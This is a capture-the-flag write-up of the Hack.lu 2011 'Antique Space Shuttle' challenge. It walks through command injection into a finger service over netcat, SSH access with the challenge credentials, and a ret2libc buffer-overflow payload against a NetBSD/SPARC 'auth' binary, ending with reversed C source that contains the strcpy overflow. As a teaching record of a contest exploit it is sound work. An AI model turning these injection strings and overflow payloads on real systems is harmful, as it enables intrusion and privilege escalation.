Write-up - Hack.lu 2011 Antique Space Shuttle (300)

by @Jonathan Salwan and @Florian Gaultier- 2011-09-21

Description

Your command is to get as much information about the crew of an antique space shuttle. We know our acient father used finger as reference point at nc ctf.hack.lu 2003. By connecting to the service it was possible to execute shell commands.

$> nc ctf.hack.lu 2003
;id
Login    Name                Tty      Idle  Login Time   Office     Office Phone
root     Charlie Root        pts/0      17  Tue 11:00    
user                         pts/1      17  Tue 11:27    
uid=1000(user) gid=100(users) groups=100(users)

We list the current directory.

$> nc ctf.hack.lu 2003
;ls
Login    Name                Tty      Idle  Login Time   Office     Office Phone
root     Charlie Root        pts/0      17  Tue 11:00    
user                         pts/1      17  Tue 11:27    
auth
finger.py
info

We see the "info" file

$> nc ctf.hack.lu 2003
;cat info
Login    Name                Tty      Idle  Login Time   Office     Office Phone
root     Charlie Root        pts/0      17  Tue 11:00    
user                         pts/1      17  Tue 11:27    
Ok so you got access, now try to get more privileges by exploiting the auth protocol. 
you can login to ssh at port 2004 with user:user4422

So, in connecting with ssh to the machine we can begin to exploit the "auth" binary. The OS is NetBSD on Sparc architecture.

$> file ./auth
ELF 32-bit MSB executable, SPARC, version 1 (SYSV), dynamically linked (uses shared libs), for NetBSD 5.1, stripped

The program takes two arguments, a string and a number. It was possible to exploit a buffer overflow if we setting a -1 number. Regarding the safety of ASLR is disabled but the NX bit is enabled, so it's possible to make ret2libc. We start by retrieving the address of system in the libc, it's 0x2009e4c4. Remember that we are in Big Endian.

Our payload will be:

[init reg][%o0][%pc @system][/bin/sh]
            |                ^
            +----------------+


-bash-4.2$ /home/user/auth "`perl -e 'print "\xef\xff\xfd\x73"x10 ."\xef\xff\xfd\xa0"x9 ."\x20\x09\xe4\xc4" \
."/////////bin/sh"'`" -1
trying to login
$ id
uid=1000(user) gid=100(users) egid=101(leaders) groups=100(users)
$ ls /home
klingone user
$ cat /home/klingone/secret
LOGBOOK ANDROMEDA7
------------------
key: a3YCcRtDqLMp0OK2

Reverse

// auth binary running on netbsd/sparc

void copy(char *srcstr)
{
    char * dststr[16];
    strcpy(dststr, srcstr);
}

int main(int argc, char* argv[])
{
    int numchars;
    int arglen;
    if (argc != 3)
    {
        printf("no access: %d", argc);
        return 1;
    }

    numchars = atoi(argv[2]);
    if (numchars > 8)
    {
        printf("buffer overflow detected")
        return 1;
    }

    arglen = strlen(argv[1]);
    if (arglen < numchars)
    {
        puts("trying to login");
        copy(argv[1]);
    }
    return 0;
}